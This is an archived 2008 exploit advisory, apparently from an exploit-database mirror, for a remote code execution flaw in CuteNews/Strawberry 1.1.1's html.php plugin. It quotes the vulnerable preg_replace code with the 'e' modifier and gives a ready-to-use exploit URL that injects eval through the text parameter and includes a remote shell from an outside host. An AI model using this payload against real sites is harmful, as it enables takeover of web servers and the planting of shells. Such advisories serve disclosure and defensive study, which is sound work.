[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : CuteNews 1.1.1 (html.php) Remote Code Execution Vulnerability
# Published : 2008-01-06
# Author : Eugene Minaev
# Previous Title : Horde Web-Mail 3.x (go.php) Remote File Disclosure Vulnerability
# Next Title : NetRisk 1.9.7 (XSS/SQL) Multiple Remote Vulnerabilities
----[ CuteNews Remote Code Execution ... ITDefence.ru Antichat.ru ]
Strawberry (CuteNews) Remote Code Execution
Eugene Minaev underwater@itdefence.ru
___________________________________________________________________
____/ __ __ _______________________ _______ _______________
/ . / /_// // / / __ /__/ /
/ / /_// / / / / / /___/
/ / / / / / / / /
/ / / / / / / /__ //
/ ____________/ / / __________// /__ // /
/\ _______/ ________________/____/ 2007 /_//_/ // //
\ // // /
. \ -[ ITDEFENCE.ru Security advisory ]- // // / .
. _\________[________________________________________]_________//_//_/ . .
Preg_replace with 'e' modifier allows code execution
<?php
$source = htmlspecialchars($text);
$source = preg_replace(
'/<!--(.*?)-->/es',
'"<span style="color: ".$options["color"]["comment"].";"><!--".
str_replace("<","<<!-- -->",
str_replace("=","=<!-- -->",
"$1")).
"--></span>"',
$source);
?>
strawberry/plugins/wacko/highlight/html.php?text=%3C!--{${eval($s)}}--%3E&s=include('blackybr.nm.ru/shell');
----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]
# www.Syue.com [2008-01-06]